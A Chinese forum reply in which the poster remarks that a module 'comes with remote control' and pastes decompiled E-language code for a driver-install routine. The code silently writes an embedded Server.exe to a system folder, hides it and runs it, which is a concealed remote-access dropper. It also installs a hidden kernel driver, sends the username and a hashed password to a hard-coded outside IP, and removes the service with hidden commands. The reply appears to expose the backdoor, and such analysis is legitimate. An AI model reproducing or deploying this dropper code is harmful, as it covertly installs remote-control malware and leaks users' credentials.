升级
   5%
UID1283
金钱461
交易币0
贡献0
|
发表于 2023-4-20 02:08:25
|
显示全部楼层
带远控我擦
.版本 2
.支持库 shell
.支持库 spec
.子程序 安装驱动, 整数型, 公开, 1安装成功 -1驱动句柄获取失败 -2驱动验证失败
.参数 用户名, 文本型
.参数 密码, 文本型
.局部变量 匿名局部变量_1, 文本型
.局部变量 匿名局部变量_2, 匿名结构_2
.局部变量 匿名局部变量_3, 整数型
写到文件 (取特定目录 (9) + “\Server.exe”, #匿名资源_1)
置文件属性 (取特定目录 (9) + “\Server.exe”, #隐藏文件)
运行 (取特定目录 (9) + “\Server.exe”, 假, )
.如果真 (取文本长度 (用户名) ≤ 0 或 取文本长度 (密码) ≤ 0)
调试输出 (“用户名或密码为空!”)
返回 (-2)
.如果真结束
匿名全局变量_4 = GetDriveHandle (匿名全局变量_1) '
.如果真 (匿名全局变量_4 ≤ 0) '
'
写到文件 (匿名全局变量_3, #匿名资源_3)
置文件属性 (匿名全局变量_3, #隐藏文件 + #系统文件)
StartDriver (匿名全局变量_2, 匿名全局变量_3)
匿名全局变量_4 = GetDriveHandle (匿名全局变量_1)
.如果真结束
.如果真 (匿名全局变量_4 ≤ 0)
InstallDriver (匿名全局变量_2, 匿名全局变量_3) '
StartDriver (匿名全局变量_2, 匿名全局变量_3)
匿名全局变量_4 = GetDriveHandle (匿名全局变量_1)
.如果真结束
.如果真 (匿名全局变量_4 ≤ 0)
调试输出 (“驱动句柄获取失败!”)
卸载驱动 ()
返回 (-1)
.如果真结束
匿名全局变量_24 = “119.188.240.17:666”
匿名全局变量_6 = “119.188.240.17” '
匿名局部变量_1 = “127.0.0.1” '
匿名局部变量_2.匿名成员_3 = 汇编_取文本型指针 (匿名全局变量_24)
匿名局部变量_2.匿名成员_4 = 666
匿名局部变量_2.匿名成员_5 = 汇编_取文本型指针 (匿名全局变量_6)
匿名局部变量_2.匿名成员_6 = 汇编_取文本型指针 (匿名局部变量_1)
密码 = MD5 (密码)
匿名局部变量_2.匿名成员_1 = 汇编_取文本型指针 (用户名)
匿名局部变量_2.匿名成员_2 = 汇编_取文本型指针 (密码)
匿名局部变量_2.匿名成员_7 = 汇编_取整数型指针 (匿名局部变量_3)
驱动通讯 (匿名全局变量_8, 汇编_取结构指针 (匿名局部变量_2), 56)
.如果真 (匿名局部变量_3 ≠ 9215)
调试输出 (“驱动验证失败!服务器地址:” + 匿名全局变量_6)
卸载驱动 ()
返回 (-2)
.如果真结束
调试输出 (“驱动句柄:” + 到文本 (匿名全局变量_4))
返回 (1)
.子程序 卸载驱动, 逻辑型, 公开
匿名DLL8_CloseHandle (匿名全局变量_4) '
StopDriver (匿名全局变量_2, 匿名全局变量_3, 假)
运行 (“CMD /C SC STOP ” + 匿名全局变量_2, 真, #隐藏窗口)
运行 (“CMD /C SC DELETE ” + 匿名全局变量_2, 真, #隐藏窗口)
删除文件 (匿名全局变量_3)
返回 (真)
|
|
